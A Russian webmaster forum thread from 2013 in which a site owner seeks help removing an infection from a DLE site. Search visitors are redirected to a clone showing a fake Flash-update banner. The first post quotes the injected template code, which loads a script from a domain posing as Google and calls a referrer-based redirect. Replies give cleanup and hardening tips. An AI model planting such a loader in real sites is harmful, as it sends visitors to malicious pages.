X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Помогите убрать вирус с сайта
Miha
Miha
Topic Starter сообщение 7.1.2013, 14:33; Ответить: Miha
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 343
Регистрация: 24.1.2009
Поблагодарили: 72 раза
Репутация:   21  


Есть сайтик - shkola-fan.ru
Уже два года капает денежка в сапе. Периодически даже есть заявки на гогетлинксе. Поэтому терять жалко.

Проблема в следующем.
Когда переходишь на сайт напрямую вбивая адрес - все нормально.
Если же переходишь с поисковиков, то попадаешь на какую-то хрень -
http://shkola-fan.ru.locz.ru/?

При этом на фоне клона - копия моего сайта. А по центру всплывающий банер с предложением обновить флешплеер. Не знаю, на что рассчитывают, т.к. трафика на сайте нет вообще.

Обвновлял версию движка до последней. Помогло на время, потом опять. Сайт на хостинге один.

Что делать?

По отличии в дате изменения увидел, что в main.tpl добавили вот это:
<!--x813n--><script type="text/javascript" src='http://google-jquery.ru/jquery.js'></script> <script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n--><!--x813n--><script type="text/javascript" src='http://google-jquery.ru/jquery.js'></script>
<script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n--></body> </html>


Удалить это не проблема. Как сделать так, чтобы не появлялось.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Kuznec37
Kuznec37
сообщение 7.1.2013, 14:38; Ответить: Kuznec37
Сообщение #2


Старожил
******

Группа: Active User
Сообщений: 1134
Регистрация: 24.4.2008
Из: Кафа
Поблагодарили: 279 раз
Репутация:   32  


(Miha @ 7.1.2013, 11:26) *
Что делать?

1. Чистить комп, не хранить пароли в FTP-клиенте.
Смотрите файл .htaccess, 100% там перееадресацию внедрили.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Nemovalex
Nemovalex
сообщение 7.1.2013, 14:38; Ответить: Nemovalex
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 480
Регистрация: 18.4.2012
Из: Москва
Поблагодарили: 120 раз
Репутация:   24  


Хостинг нормальный используете? Иногда бывает, что это из за хостинга, то есть они меняют код.
Так же проверьте сайтик айболитом.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 7.1.2013, 14:58; Ответить: Rampage
Сообщение #4


Участник
***

Группа: User
Сообщений: 240
Регистрация: 20.11.2010
Из: localhost
Поблагодарили: 68 раз
Репутация:   24  


стучи в асю попробуем решить


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 7.1.2013, 15:11; Ответить: seomasters
Сообщение #5


клоновод
*****

Группа: Banned
Сообщений: 701
Регистрация: 22.9.2011
Из: Россия, Крым
Поблагодарили: 245 раз
Репутация:   62  


http://www.maultalk.com/topic140563s0.html...p;#entry1524669

Если ещё актуально!
Готов помочь в решение вашей проблемы.

Сообщение отредактировал seomasters - 7.1.2013, 15:11


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
spy3r
spy3r
сообщение 7.1.2013, 19:09; Ответить: spy3r
Сообщение #6


Новичок
*

Группа: User
Сообщений: 17
Регистрация: 18.12.2012
Из: Бишкек
Поблагодарили: 6 раз
Репутация:   1  


Тоже подцепил сегодня этот вирус.
Могу сказать, что:
1. Точно не через сломанный фтп.
2. Точно не хостинг.
Т.к. на сервере есть виртуалки пожирнее, а вирус установился в самый мелкий сайтик с 5 людьми в сутки))

95%, что это какая-то дыра в DLE.
Сейчас обновился до 9.7.
Выставил на папку templates CHMOD - 644, проверил, что средствами DLE редактировать шаблоны не даёт (выводит Нет прав на запись файла. Установите CHMOD (666) ).
На всякий случай ещё сменил пароли и переименовал админку.

Кстати, пароль у меня стоял qweqwe - т.е. возможно сбрутили.

Сообщение отредактировал spy3r - 7.1.2013, 19:11
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
neoBuT
neoBuT
сообщение 13.1.2013, 14:42; Ответить: neoBuT
Сообщение #7


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 12.1.2013
Из: С марса...
Поблагодарили: 2 раза
Репутация:   0  


Сталкивался с данной проблемой, решение простое но более забыл о спиногрызе. Стучите в аську помогу вам с решением этой проблемы. Аська 581-797-560 .

Сообщение отредактировал neoBuT - 13.1.2013, 14:55


--------------------
Просто сайт о богато
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Hind
Hind
сообщение 14.2.2013, 4:45; Ответить: Hind
Сообщение #8


Участник
***

Группа: User
Сообщений: 171
Регистрация: 6.7.2010
Поблагодарили: 43 раза
Репутация:   12  


neoBuT, ну и как же вы так точно определили уязвимость? Научите! А другой точно понял, что подцепил такой же вирус. Расскажите всем ваш простой метод! Уязвимостей тысячи, у ТС может стоять какое-нибудь дополнение к cms с уязвимостью. Научите также лечить и всё понимать по темам на форуме.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Помогите выбрать ноутбук
Ноутбук для детей
24 kstnews 479 Сегодня, 0:18
автор: Room
Открытая тема (нет новых ответов) Помогите разобраться с Android TV
2 MakDonald 161 Вчера, 21:09
автор: MakDonald
Открытая тема (нет новых ответов) Оптимизирую Скорость Загрузки Вашего Сайта и Увеличу количество баллов в Гугл Пейдж Спид
0 procsi 173 Вчера, 17:40
автор: procsi
Открытая тема (нет новых ответов) [РЕКОМЕНДУЮ] >>>Тестирование Вашего сайта, сервера на устойчивость и уязвимость!
18 barbaddos 2371 Вчера, 16:33
автор: barbaddos
Открытая тема (нет новых ответов) Чем сжимать картинки для сайта без потери качества
1st-finstep.ru - Заработок в сети и методы продвижения сайта
16 komarik_vlad 1728 17.12.2017, 20:11
автор: komarik_vlad


 



RSS Текстовая версия Сейчас: 19.12.2017, 0:31
Дизайн